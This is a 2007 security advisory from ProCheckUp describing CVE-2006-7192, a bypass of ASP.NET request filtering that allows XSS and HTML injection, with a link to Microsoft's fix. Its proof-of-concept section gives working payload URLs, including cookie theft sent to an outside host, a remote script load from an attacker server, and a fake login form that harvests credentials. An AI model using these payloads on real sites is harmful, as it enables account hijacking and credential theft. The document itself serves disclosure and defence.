PR07-03: Microsoft ASP.NET request filtering can be bypassed allowing XSS and HTML injection attacks
This advisory has been published following consultation with UK CPNI (formally known as NISCC)
Date Found: November 2005
Date Public: 5th April 2007
Severity: Medium
CVE reference: CVE-2006-7192
BID: 20753
Vulnerable:
The following client/server environment was tested and found vulnerable:
- Microsoft Windows Server 2003 Standard Edition Build 3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11
Authors:
Request filtering bypass found by Richard Brain and further researched by Jan Fry and Adrian Pastor
Description:
By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.
It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable
while carrying out penetration tests on several customer's live environments.
Notes:
In order to exploit this flaw, an attacker would need to target a .NET server-side application whichdoes not sanitize input parameters properly before being returned back to the web browser.
Proof of concept:
In the following examples 'vuln-search.aspx' is a script that solely relies on ASP .NET request filtering, and returns user-supplied input back to the browser.
Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
Redirection Attack
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com")>
Cookie stealing
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>
Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
(document.createElement("script")))>
</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>
where 'xss.js' could contain a snippet that overwrites the entire document's HTML body. i.e.:
document.body.innerHTML = '<b>since we can now insert brakets without having to escape the request filtering, we\'re free to insert any HTML tags</b></br><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"></br><input type="submit" value="Log in"></form>';
myform.login.focus();
Consequences:
Attackers can hijack user accounts through XSS and HTML injection attacks against vulnerable applications that
solely rely on ASP .NET request filtering.
Fix:
http://www.microsoft.com/technet/security/Bulletin/MS07-040.mspx
References:
http://www.procheckup.com/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project
Legal:
Copyright 2007 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community
for the purpose of alerting them to problems, if and only if, the Bulletin is not edited
or changed in any way, is attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. |
